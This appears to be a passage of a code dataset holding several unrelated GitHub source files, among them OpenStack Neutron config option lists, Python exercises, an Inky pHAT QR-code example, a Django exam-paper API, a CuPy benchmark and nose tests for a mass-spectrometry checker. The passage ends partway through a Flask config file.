neutron.conf.agent.dhcp.DHCP_OPTS,\n neutron.conf.agent.dhcp.DNSMASQ_OPTS)\n )\n ]\n\n\ndef list_linux_bridge_opts():\n return [\n 
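# Each entry below pairs a config section name with its option list; these (section, opts) tuples are the shape that oslo-config-generator consumes when building sample configs.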
('DEFAULT',\n neutron.conf.service.RPC_EXTRA_OPTS),\n ('linux_bridge',\n neutron.conf.plugins.ml2.drivers.linuxbridge.bridge_opts),\n ('vxlan',\n neutron.conf.plugins.ml2.drivers.linuxbridge.vxlan_opts),\n ('agent',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.agent.agent_opts,\n neutron.conf.agent.agent_extensions_manager.\n AGENT_EXT_MANAGER_OPTS)\n ),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts)\n ]\n\n\ndef list_l3_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.l3.config.OPTS,\n neutron.conf.service.SERVICE_OPTS,\n neutron.conf.agent.l3.ha.OPTS,\n neutron.conf.agent.common.PD_DRIVER_OPTS,\n neutron.conf.agent.common.RA_OPTS)\n ),\n ('agent',\n neutron.conf.agent.agent_extensions_manager.AGENT_EXT_MANAGER_OPTS),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts)\n ]\n\n\ndef list_macvtap_opts():\n return [\n ('macvtap',\n neutron.conf.plugins.ml2.drivers.macvtap.macvtap_opts),\n ('agent',\n neutron.conf.plugins.ml2.drivers.agent.agent_opts),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts)\n ]\n\n\ndef list_metadata_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n meta_conf.SHARED_OPTS,\n meta_conf.METADATA_PROXY_HANDLER_OPTS,\n meta_conf.UNIX_DOMAIN_METADATA_PROXY_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('agent', neutron.conf.agent.common.AGENT_STATE_OPTS)\n ]\n\n\ndef list_metering_agent_opts():\n return [\n ('DEFAULT', neutron.conf.services.metering_agent.metering_agent_opts),\n ]\n\n\ndef list_ml2_conf_opts():\n return [\n ('ml2',\n neutron.conf.plugins.ml2.config.ml2_opts),\n ('ml2_type_flat',\n neutron.conf.plugins.ml2.drivers.driver_type.flat_opts),\n ('ml2_type_vlan',\n neutron.conf.plugins.ml2.drivers.driver_type.vlan_opts),\n ('ml2_type_gre',\n neutron.conf.plugins.ml2.drivers.driver_type.gre_opts),\n ('ml2_type_vxlan',\n neutron.conf.plugins.ml2.drivers.driver_type.vxlan_opts),\n ('ml2_type_geneve',\n neutron.conf.plugins.ml2.drivers.driver_type.geneve_opts),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('ovs_driver',\n neutron.conf.plugins.ml2.drivers.openvswitch.mech_ovs_conf.\n ovs_driver_opts),\n ('sriov_driver',\n neutron.conf.plugins.ml2.drivers.mech_sriov.mech_sriov_conf.\n sriov_driver_opts)\n ]\n\n\ndef list_ovs_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('ovs',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.ovs_opts,\n neutron.conf.agent.ovsdb_api.API_OPTS)\n ),\n ('agent',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.agent_opts,\n neutron.conf.agent.agent_extensions_manager.\n AGENT_EXT_MANAGER_OPTS)\n ),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts),\n ('dhcp',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.dhcp_opts,\n neutron.conf.agent.common.DHCP_PROTOCOL_OPTS)),\n ('metadata',\n itertools.chain(\n meta_conf.METADATA_PROXY_HANDLER_OPTS))\n ]\n\n\ndef list_sriov_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('sriov_nic',\n neutron.conf.plugins.ml2.drivers.mech_sriov.agent_common.\n sriov_nic_opts),\n ('agent',\n neutron.conf.agent.agent_extensions_manager.AGENT_EXT_MANAGER_OPTS)\n ]\n\n\ndef list_experimental_opts():\n return [\n 
(neutron.conf.experimental.EXPERIMENTAL_CFG_GROUP,\n         itertools.chain(neutron.conf.experimental.experimental_opts)\n         ),\n    ]\n","repo_name":"openstack/neutron","sub_path":"neutron/opts.py","file_name":"opts.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"}
{"seq_id":"31295378429","text":"#Exercise 19:\n\"\"\"We need to print the member's name and number inside the following phrase:\n\nDear (nombre_asociado), your member number is: (numero_asociado)\"\"\"\n\nnombre_asociado = \"Jesse Pinkman\"\nnumero_asociado = 399058\n\nprint(\"Dear {}, your member number is: {}\".format(nombre_asociado, numero_asociado))\n\n\n#Exercise 20:\n# Show the user the accumulated points inside the following phrase:\n\n# You have earned (puntos_nuevos) points! In total you have (puntos_totales) points\n\npuntos_nuevos = 350\npuntos_totales = 1225\n\nprint(f\"You have earned {puntos_nuevos} points! In total you have {puntos_totales} points\")\n\n#Exercise 21:\n# Show the user the total points (previous plus new) inside the following phrase:\n\n# You have earned (puntos_nuevos) points! In total you have (puntos_anteriores + puntos_nuevos) points\n\npuntos_anteriores = 875\npuntos_nuevos = 350\n\nprint(f\"You have earned {puntos_nuevos} points! In total you have {puntos_anteriores+puntos_nuevos} points\")","repo_name":"keiver31/Fundamentos_Python","sub_path":"Modulo_2/Ej_19_20_21.py","file_name":"Ej_19_20_21.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38583578528","text":"#!/usr/bin/env python\n\nimport sys\n\nimport qrcode\nimport inkyphat\n\nprint(\"\"\"Inky pHAT: QR Code\n\nDisplay a QR Code on Inky pHAT!\n\nUsage: {} \"\"\".format(sys.argv[0]))\n\n# Max length is 152\ntext = \"\"\"In the old #BILGETANK we'll keep you in the know,\nIn the old #BILGETANK we'll fix your techie woes.\n\nhttps://www.youtube.com/pimoroniltd\"\"\"\n\nif len(sys.argv) < 2:\n    print(\"\"\"Valid colours for v2 are: red, yellow or black\nInky pHAT v1 is only available in red.\"\"\")\n    sys.exit(1)\n\ncolour = sys.argv[1]\n\ntry:\n    inkyphat.set_colour(colour)\nexcept ValueError:\n    print('Invalid colour \"{}\" for V{}\\n'.format(colour, inkyphat.get_version()))\n    if inkyphat.get_version() == 2:\n        sys.exit(1)\n    print('Defaulting to \"red\"')\n\nif len(sys.argv) > 2:\n    text = sys.argv[2]\n\n\nclass InkyQR(qrcode.image.base.BaseImage):\n    def new_image(self, **kwargs):\n        self.offset_x = kwargs.get(\"offset_x\", None)\n        self.offset_y = kwargs.get(\"offset_y\", None)\n\n        if self.pixel_size - (self.border * 2) > min(inkyphat.WIDTH, inkyphat.HEIGHT):\n            print(\"QR code is too large for Inky pHAT, it probably won't scan! 
Try `box_size=1`\")\n\n if self.offset_x is None:\n self.offset_x = (inkyphat.WIDTH // 2) - (self.pixel_size // 2)\n if self.offset_y is None:\n self.offset_y = (inkyphat.HEIGHT // 2) - (self.pixel_size // 2)\n\n box = (self.offset_x, self.offset_y, self.offset_x + self.pixel_size - 1, self.offset_y + self.pixel_size - 1)\n inkyphat.rectangle(box, fill=inkyphat.WHITE)\n\n def pixel_box(self, row, col):\n x = (col + self.border) * self.box_size\n y = (row + self.border) * self.box_size\n x += self.offset_x\n y += self.offset_y\n return [(x, y), (x + self.box_size - 1, y + self.box_size - 1)]\n\n def drawrect(self, row, col):\n box = self.pixel_box(row, col)\n inkyphat.rectangle(box, fill=inkyphat.BLACK)\n\n\ninkyphat.set_image(\"resources/empty-backdrop.png\")\n\nqr = qrcode.QRCode(\n version=1,\n box_size=2,\n border=2,\n image_factory=InkyQR\n)\n\nqr.add_data(text)\nqr.make(fit=True)\nqr.make_image()\n\ninkyphat.show()\n","repo_name":"pimoroni/inky-phat","sub_path":"examples/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"72"} +{"seq_id":"1645464238","text":"import os\nimport json\nfrom ._envi_writer import EnviWriter\nfrom ._happydata_writer import HappyDataWriter\nfrom happy.data import HappyData\n\n\nclass HappyWriter(HappyDataWriter):\n\n def name(self) -> str:\n return \"happy-writer\"\n\n def description(self) -> str:\n return \"Writes data in HAPPy format.\"\n\n def _write_data(self, happy_data_or_list, datatype_mapping=None):\n print(f\"write_data {datatype_mapping}\")\n if isinstance(happy_data_or_list, list):\n for happy_data in happy_data_or_list:\n self._write_single_data(happy_data,datatype_mapping)\n elif isinstance(happy_data_or_list, HappyData):\n self._write_single_data(happy_data_or_list, datatype_mapping)\n else:\n raise ValueError(\"Input should be either a HappyData object or a list of HappyData objects.\")\n\n def get_datatype_mapping_for(self, datatype_mapping, outputname):\n #outputname = outputname.strip(\"'\")\n #print(f\"checking: {outputname!r}\")\n #print(datatype_mapping)\n #for key in datatype_mapping:\n #print(f\"Key repr: {key!r}\")\n if datatype_mapping is None:\n #print(\"none\")\n return None\n if outputname not in datatype_mapping:\n #print(\"not in\")\n return None\n return datatype_mapping[outputname]\n \n def _write_single_data(self, happy_data, datatype_mapping=None):\n sample_id = happy_data.sample_id\n region_id = happy_data.region_id\n\n # Create a folder for the sample if it doesn't exist\n sample_dir = os.path.join(self.base_dir, sample_id)\n os.makedirs(sample_dir, exist_ok=True)\n\n # Create a folder for the region if it doesn't exist\n region_dir = os.path.join(sample_dir, region_id)\n os.makedirs(region_dir, exist_ok=True)\n\n \n # Write hyperspectral data\n hyperspec_file_path = os.path.join(region_dir, f\"{sample_id}.hdr\")\n envi_writer = EnviWriter(region_dir)\n envi_writer.write_data(happy_data.data, hyperspec_file_path, datatype=self.get_datatype_mapping_for(datatype_mapping, sample_id))\n print(f\"region happy data writer: {happy_data.data.shape}\")\n\n # Write hyperspectral metadata (global)\n hyperspec_metadata_file = os.path.join(region_dir, f\"{sample_id}_global.json\")\n print(region_dir)\n print(happy_data.global_dict)\n with open(hyperspec_metadata_file, 'w') as f:\n json.dump(happy_data.global_dict, f)\n\n # Write other metadata\n for target_name, target_data in happy_data.metadata_dict.items():\n 
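# Each metadata target is written out as its own ENVI file alongside the hyperspectral data, with an optional JSON label mapping saved next to it (see below).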
print(f\"target: {target_name}\")\n metadata_file_path = os.path.join(region_dir, f\"{target_name}.hdr\")\n envi_writer.write_data(target_data['data'], metadata_file_path, datatype=self.get_datatype_mapping_for(datatype_mapping, target_name))\n\n # Write mapping if available\n mapping = target_data.get('mapping')\n if mapping:\n mapping_json_file = os.path.join(region_dir, f\"{target_name}.json\")\n with open(mapping_json_file, 'w') as f:\n json.dump(mapping, f)\n","repo_name":"wairas/happy-hsi-to-csv","sub_path":"src/happy/writers/_happy_writer.py","file_name":"_happy_writer.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13122946232","text":"def askDate():\n print(\"entrez une date supérieur à l'an 1583 et inférieur à l'an 9999 au format DD/MM/YYYY\")\n year=0\n while year<1583 or year>9999: #la boucle se répète si les condition sur l'année ne sont pas respéctés.\n entry = input(\"date : \")\n year = int(entry[6:10]) #on récupère le substring contenant l'année\n if year<1583 or year>9999 :\n print(\"entrez une date supérieur à l'an 1583 et inférieur à l'an 9999 au format DD/MM/YYYY\") #en cas de non respect des consignes on les re-affiche\n return int(entry[0:2]),int(entry[3:5]),int(entry[6:10]) #finalement en sortant de la boucle on retourne les données\n\ndef magicCalculation(day,month,year): #permet de calculer le jour\n c = (14-month)//12\n a = year-c\n m = month +12*c -2\n j = (day + a + a//4 -a//100 + a//400 +(31*m)//12)%7 #les formules sont donnés en consigne\n\n return(j)\n\ndef DayAssignement (nb) :\n jours = {0:\"dimanche\",1:\"lundi\",2:\"mardi\",3:\"mercredi\",4:\"jeudi\",5:\"vendredi\",6:\"samedi\"} #on crée un dictionaire qui retournera le bon str en fonction du jour\n return jours[nb]\n \n\nj,m,y = askDate() #on assigne le jour à j, le mois à m et l'année à y\n\nd = magicCalculation(j,m,y) #on calcule le jour de la semaine\n\nprint(DayAssignement(d)) #on affiche le str correspondant au jour","repo_name":"HenriqueMARTINS9/ESIEE-3A","sub_path":"Python/TP1/DM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5537668184","text":"'''Detect if eyes or mouth are closed for blink detection'''\nimport math\nimport numpy as np\n\ndef eye_aspect_ratio(eye: np.array) -> float:\n '''Calculates the eye width to height ratio to indicate whether an eye is closed or not\n\n Args\n ----\n eye (np.array of floats): The facial landmark coordinates corresponding to the left or right eye\n\n Returns\n -------\n EAR (float): The computed eye aspect ratio\n '''\n\n try:\n # EAR = (|p1-p5|+|p2-p4|) / 2*|p0-p3|\n A = abs(math.dist(eye[1], eye[5]))\n B = abs(math.dist(eye[2], eye[4]))\n C = abs(math.dist(eye[0], eye[3]))\n EAR = (A + B) / (2.0 * C)\n except ZeroDivisionError:\n EAR = None\n\n return EAR\n\ndef mouth_aspect_ratio(mouth: np.array) -> float:\n '''Calculates the mouth width to height ratio to indicate whether the mouth is closed or not\n\n Args\n ----\n mouth (np.array of floats): The facial landmark coordinates corresponding to the mouth\n\n Returns\n -------\n MAR (float): The computed mouth aspect ratio\n '''\n \n try:\n # MAR = (|p2-p8|+|p3-p7|+|p4-p6|) / 2*|p1-p5|\n A = abs(math.dist(mouth[13], mouth[19]))\n B = abs(math.dist(mouth[14], mouth[18]))\n C = abs(math.dist(mouth[15], mouth[17]))\n D = abs(math.dist(mouth[12], mouth[16]))\n MAR = (A + 
B + C) / (2.0 * D)\n    except ZeroDivisionError:\n        MAR = None\n\n    return MAR","repo_name":"Nielsencu/ripplecreate-attention-model","sub_path":"src/landmark_metrics.py","file_name":"landmark_metrics.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31020064996","text":"from django.shortcuts import get_object_or_404\nfrom django.db import transaction\nfrom django.contrib.auth import get_user_model\nfrom django.db.models import Q, Sum\nfrom django.contrib.postgres.aggregates import ArrayAgg\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.generics import CreateAPIView\n\nfrom .models import CheckingTestPaper, Question, Answer, TestPaper, Profile, Subject\nfrom .serializers import (SubjectSerializer, ProfileSerializer, QuestionSerializer,\nQuestionDetailSerializer)\n\nUser = get_user_model()\n\nclass UserCreation(APIView):\n    \n    def post(self, request, *args, **kwargs):\n        params = request.data\n        if 'username' in params:\n            username = params['username']\n        else:\n            return Response({\"message\": \"username is a required field\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        if 'first_name' not in params or 'last_name' not in params:\n            return Response({\"message\": \"first_name and last_name are required fields\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        first_name = params['first_name']\n        last_name = params['last_name']\n        if 'contact' not in params:\n            return Response({\"message\": \"Contact number is a required field\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        contact = params['contact']\n        if 'email' not in params:\n            return Response({\"message\": \"email is a required field\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        if 'subject' not in params:\n            return Response({\"message\": \"subject is a required field\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        if 'profile_choice' not in params:\n            return Response({\"message\": \"profile_choice is a required field\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        email = params['email']\n        lookup = Q(user__email=email) | Q(mobile_number=contact)\n        if Profile.objects.filter(lookup).exists():\n            return Response({\"message\": \"Contact or Email already exists\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        transaction.set_autocommit(autocommit=False)\n        user_obj = User.objects.create(\n            username=username,\n            email=email,\n            first_name=first_name,\n            last_name=last_name,\n        )\n        user_obj.set_password(params['password'])\n        user_obj.save()\n        profile = Profile.objects.create(\n            user=user_obj,\n            subject_id=params['subject'],\n            profile_choice=params['profile_choice'],\n            mobile_number=contact\n        )\n\n        data = ProfileSerializer(profile, many=False).data\n        transaction.commit()\n        return Response({\"result\": data}, status=status.HTTP_201_CREATED)\n\nclass UserDetails(APIView):\n\n    def get(self, request, *args, **kwargs):\n        pk = request.query_params.get('profile_id')\n        profile_obj = get_object_or_404(Profile, id=pk)\n        data = ProfileSerializer(profile_obj, many=False).data\n        return Response({\"result\": data}, status=status.HTTP_200_OK)\n\n\nclass SubjectsList(APIView):\n    \n    def get(self, request, *args, **kwargs):\n        subjects = Subject.objects.filter(is_active=True,\n        is_delete=False)\n        serializer = SubjectSerializer(subjects, many=True).data\n        print(serializer)\n        return Response({\"result\":serializer}, 
status=status.HTTP_200_OK)\n\n\nclass QuestionApiView(APIView):\n    model = Question\n    queryset = Question.objects.filter(is_active=True,\n    is_delete=False)\n\n    def get(self, request, *args, **kwargs):\n        params = request.query_params\n        filters = {}\n        if 'subject' in params:\n            filters['subject_id'] = params['subject']\n        if 'user' in params:\n            filters['creater_id'] = params['user']\n        if 'search' in params:\n            filters['question__icontains'] = params['search']\n        if 'question_id' in params:\n            question_objs = self.queryset.filter(id=params['question_id'])\n        else:\n            question_objs = self.queryset.filter(**filters)\n        data = QuestionSerializer(question_objs, many=True).data\n        return Response(\n            {\"result\": data}, status=status.HTTP_200_OK\n        )\n\n    def post(self, request, *args, **kwargs):\n        data = request.data\n        if 'question' not in data or 'q_marks' not in data:\n            return Response({'message': \"Required fields are missing\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        question = data['question']\n        marks = data['q_marks']\n        # TODO need to update after authorization\n        user = User.objects.filter(profile__profile_choice=0).last()\n        subject = user.profile_set.first().subject\n        if 'answer' not in data:\n            return Response({\"message\": \"Answer details should be provided\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        answer = data['answer']\n        transaction.set_autocommit(autocommit=False)\n        if Question.objects.filter(question=question).exists():\n            return Response({\"message\": \"Question with the same details already exists, please search for the question\"},\n            status=status.HTTP_400_BAD_REQUEST)\n        que_obj = Question.objects.create(\n            question=question,\n            creater_id=user.id,\n            subject_id=subject.id,\n            question_marks=marks\n        )\n        answer_obj = Answer.objects.create(\n            question_id=que_obj.id,\n            answer=answer,\n            answer_type='TEXT'\n        )\n        serializer = QuestionDetailSerializer(answer_obj, many=False)\n        transaction.commit()\n        return Response({\"result\": serializer.data},\n        status=status.HTTP_201_CREATED)\n\n\nclass TestPaperCreationView(CreateAPIView):\n    model = TestPaper\n\n    def post(self, request, *args, **kwargs):\n        data = request.data\n        if \"questions\" not in data:\n            return Response({\"message\": \"Need Questions\"}, status=status.HTTP_400_BAD_REQUEST)\n        questions = data['questions'].split(\",\")\n        number_of_questions = len(questions)\n        que_objs = Question.objects.filter(\n            id__in=questions)\n        total_marks = que_objs.aggregate(\n            total_marks=Sum('question_marks'))['total_marks']\n        if 'cut_off_marks' not in data:\n            return Response({\"message\": \"Need to mention Cut Off Marks\"}, status=status.HTTP_400_BAD_REQUEST)\n        cutoffmarks = int(data['cut_off_marks'])\n        if cutoffmarks > total_marks:\n            return Response({\"message\": \"Cut off marks are greater than total marks\"}, status=status.HTTP_400_BAD_REQUEST)\n        # TODO need to update after authorization\n        user = User.objects.filter(profile__profile_choice=0).last()\n        subject = user.profile_set.first().subject\n        test_paper_obj = self.model.objects.create(\n            total_marks=total_marks,\n            cut_off_marks=cutoffmarks,\n            setter_id=user.id,\n            subject_id=subject.id,\n            number_of_questions=number_of_questions\n        )\n        test_paper_obj.questions.add(*questions)\n        test_paper_obj.save()\n        return Response({\"message\": \"Test Paper is created\"}, status=status.HTTP_201_CREATED)\n\nclass TestPaperListView(APIView):\n    model = TestPaper\n    queryset = TestPaper.objects.filter(is_active=True,\n    is_delete=False)\n    \n    def get(self, request, *args, **kwargs):\n        # TODO need to update after authorization\n        user = 
User.objects.filter(profile__profile_choice=0).first()\n        test_papers = TestPaper.objects.filter(\n            # setter_id=user.id,\n            is_active=True,\n            is_delete=False,\n        ).annotate(question=ArrayAgg('questions__question'),\n                   answers=ArrayAgg('questions__answer__answer')\n                   ).values('question', 'answers', 'total_marks', 'cut_off_marks',\n                            'subject__subject_name', 'is_checker_approved', 'is_examinar_approved',\n                            'checker_review', 'examiner_review'\n                            )\n        return Response({\"result\": test_papers}, status=status.HTTP_200_OK)\n\nclass TestPaperSetterSubmission(APIView):\n    model = TestPaper\n    queryset = TestPaper.objects.filter(is_active=True,\n    is_delete=False)\n\n    def get(self, request, *args, **kwargs):\n        # TODO need to update after authorization\n        user = User.objects.filter(profile__profile_choice=0).first()\n        test_papers = TestPaper.objects.filter(\n            setter_id=user.id,\n            is_active=True,\n            is_delete=False,\n            is_sent_for_cheeck=False\n        ).annotate(question=ArrayAgg('questions__question'),\n                   answers=ArrayAgg('questions__answer__answer')\n                   ).values('question', 'answers', 'total_marks', 'cut_off_marks',\n                            'subject__subject_name', 'is_checker_approved', 'is_examinar_approved',\n                            'checker_review', 'examiner_review'\n                            )\n        return Response({\"result\": test_papers}, status=status.HTTP_200_OK)\n\n    def post(self, request):\n        data = request.data\n        if \"testpaper_id\" not in data:\n            return Response({\"message\": \"Test Paper is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n        testpaper_obj = get_object_or_404(TestPaper, id=data['testpaper_id'])\n        testpaper_obj.is_sent_for_cheeck = True\n        testpaper_obj.save()\n        return Response({\"message\": \"Sent for checking\"}, status=status.HTTP_200_OK)\n\nclass TestPaperCheckerAcception(APIView):\n    model = TestPaper\n    \n    def get(self, request):\n        qp_id = request.query_params.get('testpaper_id')\n        testpaper = self.model.objects.get(id=qp_id)\n        # TODO need to update after authorization\n        user = User.objects.filter(profile__profile_choice=1).first()\n        testpaper.checker = user\n        testpaper.save()\n        response = {\n            \"message\": \"Accepted for checking\",\n            \"id\": qp_id,\n            \"Number of Questions\": testpaper.number_of_questions,\n            \"questions\": testpaper.questions.values_list('question', flat=True),\n            \"Total Marks\": testpaper.total_marks,\n            \"Cut Off Marks\": testpaper.cut_off_marks\n        }\n        return Response(response, status=status.HTTP_200_OK)\n    \n    def post(self, request):\n        data = request.data\n        if \"testpaper_id\" not in data:\n            return Response({\"message\": \"Test Paper is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n        testpaper_obj = get_object_or_404(TestPaper, id=data['testpaper_id'])\n        if \"approval\" not in data:\n            return Response({\"message\": \"Approval is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n        checker_message = data.get('message')\n        approval = data['approval'] == \"True\"\n        testpaper_obj.is_checker_approved = approval\n        check_paper_obj, is_created = CheckingTestPaper.objects.get_or_create(test_paper_id=testpaper_obj.id)\n        testpaper_obj.checker_review = checker_message\n        check_paper_obj.checker_review = checker_message\n        check_paper_obj.is_checker_approved = approval\n        check_paper_obj.save()\n        response = {\n            'message': 'Paper is approved by checker and sent to examiner'\n        }\n        if not approval:\n            testpaper_obj.checker = None\n            testpaper_obj.is_sent_for_cheeck = False\n            response['message'] = \"Paper is not approved, please check\"\n        testpaper_obj.save()\n        return Response(response, 
status=status.HTTP_200_OK)\n\n\n","repo_name":"KarunakarKodaru/Exam-Backend","sub_path":"papers_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"7509707096","text":"import numpy as np 
import cupy as cp 
import time 

x_gpu = cp.array([1,0,1,1]) #declaring a cupy array
norm = cp.linalg.norm(x_gpu) #test inbuilt function that works on gpu
#print(norm)

# cp.cuda.Device(n).use() for swapping gpu on multi gpu systems

\"\"\"
Operations are performed on current device
therefore once gpu switched operations on variable
declared with previous device must not be run.
\"\"\"

x = np.array([1,2,3])
x2_gpu = cp.asarray(x) # this function can be used to pass np arrays to cp arrays
x3 = cp.asnumpy(x2_gpu) # this function can be used to pass cp arrays to numpy arrays

\"\"\"
For cpu/gpu agnostic code this can be used:
\"\"\"

#xp = cp.get_array_module(x)
N = 1000
N2 = 1000000
y = np.random.uniform(0,1,N2)
y_gpu = cp.asarray(y)

print(\"test between numpy and cupy\")
print(\"numpy test\")
t0 = time.perf_counter()  # time.clock() was removed in Python 3.8; perf_counter() is the replacement
for i in range(N):
    np.linalg.norm(y)
t1 = time.perf_counter() - t0
print(t1)
print(\"cupy test\")
t0 = time.perf_counter()
for i in range(N):
    cp.linalg.norm(y_gpu)
t1 = time.perf_counter() - t0
print(t1)

\"\"\"
on HP laptop with Intel i7-7700HQ processor with
NVidia GTX 1050 6GB VRAM with 8GB RAM,
N = 1000, N2 = 1000000
the following results were obtained:

test between numpy and cupy
numpy test
7.684543
cupy test
1.631170000000001
\"\"\"","repo_name":"srike27/cupycopypasta","sub_path":"cupy01.py","file_name":"cupy01.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18682635725","text":"\n\nfrom nose.tools import *\nimport os\nimport shutil\nfrom mgf_checker.checker import Checker\n\n\nclass TestChecker(object):\n    _multiprocess_shared_ = True\n\n    def test_parsemzid(self):\n        c = Checker(\"tests/data/F082488.mzid\")\n        c.parse_mz_id()\n        assert_equal(c.identifications[0][1].ion_series_ary[0].fragtype, \"frag: b ion\")\n        assert_equal(c.identifications[0][1].ion_series_ary[0].charge, 1)\n        assert_equal(c.identifications[0][1].ion_series_ary[0].mz_ary, 129.10202)\n        \"\"\"\n        \n        \n        \n        \n        \n        \n        \"\"\"\n\n    def test_readmgf(self):\n        c = Checker(\"tests/data/F082488.mzid\")\n        c.read_enhanced_spectrum(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.mgf\")\n        assert_equal(c.mgf_reads['39'].mz_ary[0], 136.06149289999999)\n\n        ms = c.mgf_reads['39'].request_ms()\n\n        assert_equal(len(ms.spectrum[0][351]), 1)\n\n    def test_compare_mzid_mgf(self):\n        # c = Checker(\"/home/tobiass/Desktop/F083063.mzid\")\n        # c.parse_mz_id()\n        # c.read_enhanced_spectrum(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.mgf\")\n        # c.analyse_mzid_vs_mgf()\n        # assert_equal(1, 2)\n        pass\n\n    def test_get_peptide_info(self):\n        c = Checker(\"tests/data/F082488.mzid\")\n        c.parse_mz_id_peptide_ref()\n        assert_equal(c.peptide_evidence['peptide_6190_1'].peptide_sequence, 'CCTESLVNRRPCFSALTPDETYVPK')\n        assert_equal(c.peptide_evidence['peptide_6190_1'].modification[0].name, 'TMT6plex')\n        assert_equal(c.peptide_evidence['peptide_6190_1'].modification[25].name, 'TMT6plex')\n        assert_equal(c.peptide_evidence['peptide_6190_1'].modification[2].name, 'Carbamidomethyl')\n\n    def 
test_info_about_peptide_tag_amount(self):\n \"\"\"\n peptide_6180_1 has two TMT and is therefore more interesting\n sequence is 23 amino acid long\n \"\"\"\n c = Checker(\"tests/data/F082488.mzid\")\n c.parse_mz_id()\n c.parse_mz_id_peptide_ref()\n assert_equal(c.peptide_evidence['peptide_6180_1'].peptide_sequence, 'CCTKPESERMPCTEDYLSLILNR')\n b_tmt, y_tmt = c.peptide_evidence['peptide_6180_1'].get_annotated_positions()\n assert_equal(b_tmt[4], 2)\n assert_equal(b_tmt[3], 1)\n assert_equal(b_tmt[1], 1)\n assert_equal(b_tmt[23], 2)\n assert_equal(y_tmt[23], 2)\n assert_equal(y_tmt[21], 1)\n assert_equal(y_tmt[20], 1)\n assert_equal(y_tmt[19], 0)\n assert_equal(y_tmt[3], 0)\n\n def test_read_score_file(self):\n c = Checker(\"tests/data/F082488.mzid\")\n allowed_ids = [8358]\n spectra = c.read_score_file(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.csv\", allowed_ids)\n assert_equal(8358 in spectra, True)\n assert_equal(len(spectra[8358]), 2)\n assert_equal(len(spectra[8358]['mz']), 129)\n\n def test_compare_mz_id_score_file(self):\n # c = Checker(\"/home/tobiass/Desktop/F083270.mzid\")\n # c.parse_mz_id()\n # c.analyze_mzid_id_vs_score_file(path_score=\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.csv\",\n # output_path=\"/home/tobiass/Desktop/out.csv\")\n assert_equal(1, 1)\n\n @classmethod\n def teardown_class(cls):\n shutil.rmtree(\"tests/data/temp\")\n\n @classmethod\n def setup_class(cls):\n if not os.path.exists(\"tests/data/temp\"):\n os.makedirs(\"tests/data/temp\")\n","repo_name":"kusterlab/MasterSpectrum","sub_path":"tests/checker_tests.py","file_name":"checker_tests.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21881416763","text":"import os\nfrom pathlib import Path\n\nfrom dotenv import load_dotenv\n\nenv = Path(\"..\") / \".env\"\nload_dotenv(dotenv_path=env)\n\nfrom app.utils import randomString, randomKey\n\n\ndef loadConfig(config, app):\n configs = {\n \"development\": DevConfig,\n \"production\": ProdConfig,\n }\n\n app.config.from_object(configs[config])\n\n\nclass Config:\n NAME = os.getenv(\"NAME\", \"Flask App\")\n SERVER_NAME = os.getenv(\"SERVER_NAME\", 